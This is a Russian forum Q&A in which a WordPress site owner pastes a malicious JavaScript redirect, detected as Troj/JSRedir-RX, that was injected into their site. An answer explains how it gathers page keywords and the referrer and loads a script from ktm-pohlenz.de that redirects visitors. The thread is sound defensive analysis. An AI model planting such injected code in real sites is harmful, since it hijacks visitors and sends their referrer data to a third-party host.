ermek6
@ermek6
::Живу с удовольствием::

Что делает этот вирус?

Всем доброго дня.
После очередного обновления WordPress яндекс обматерил мой сайт на наличие вируса Troj/JSRedir-RX

Вооружившись встроенным редактором и Chrom'ом нашел следующий код на своей страничке (Функцию checkOne добавил сам, что бы легче было читать)

Ну и собственно сабж.

function checkOne()
{
	var keywords='';
	var metas=document.getElementsByTagName('meta');
	if(metas)
	{
		for(var x=0,y=metas.length;x<y;x++)
		{
			if(metas[x].name.toLowerCase()=="keywords")
			{
				keywords+=metas[x].content;
				}
		}
	}
	return keywords!==''?keywords:null;
}

	var a='';
	setTimeout(10);
	if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0
		||document.referrer!==undefined||document.referrer!==''
		||document.referrer!==null){
			document.write('<script type="text/javascript" 
					src="http://ktm-pohlenz.de/js/jquery.min.php?c_utt=J18171&c_utm='
					+encodeURIComponent('http://ktm-pohlenz.de/js/jquery.min.php'+'?'
					+'default_keyword='
					+encodeURIComponent(
						(
							(k=checkOne())==null?(
								v=window.location.search.match(/utm_term=([^&]+)/))==null?
									(t=document.title)==null?'':t
								:v[1]
							:k))
							+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}
  • Вопрос задан
  • 2482 просмотра
Решения вопроса 1
27cm
@27cm
TODO: Написать статус
1. Функция checkOne() достаёт ключевые слова из тега <meta name="keywords" content="..." />
2. Если ключевые слова не найдены, то скрипт берёт ключевые фразы из utm_term.
3. Если ключевые фразы из utm_term не найдены, то используется title страницы.

Найденные ключевые слова кодируются и отправляются в ktm-pohlenz.de/js/jquery.min.php. В результате вставляется JavaScript, который редиректит пользователя на URL адрес, максимально соответствующий найденным ключевым словам и HTTP referer страницы. Пример для этой страницы:
<script type="text/javascript" src="http://ktm-pohlenz.de/js/jquery.min.php?c_utt=J18171&c_utm=http%3A%2F%2Fktm…IT%26se_referrer%3Dhttps%253A%252F%252Ftoster.ru%252F%26source%3Dtoster.ru"></script>


P.S.: Редирект возвращается не всегда. Возможно на стороне ktm-pohlenz.de есть какая-то фильтрация по IP, UA, параметру c_utt и т. д.
Ответ написан
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы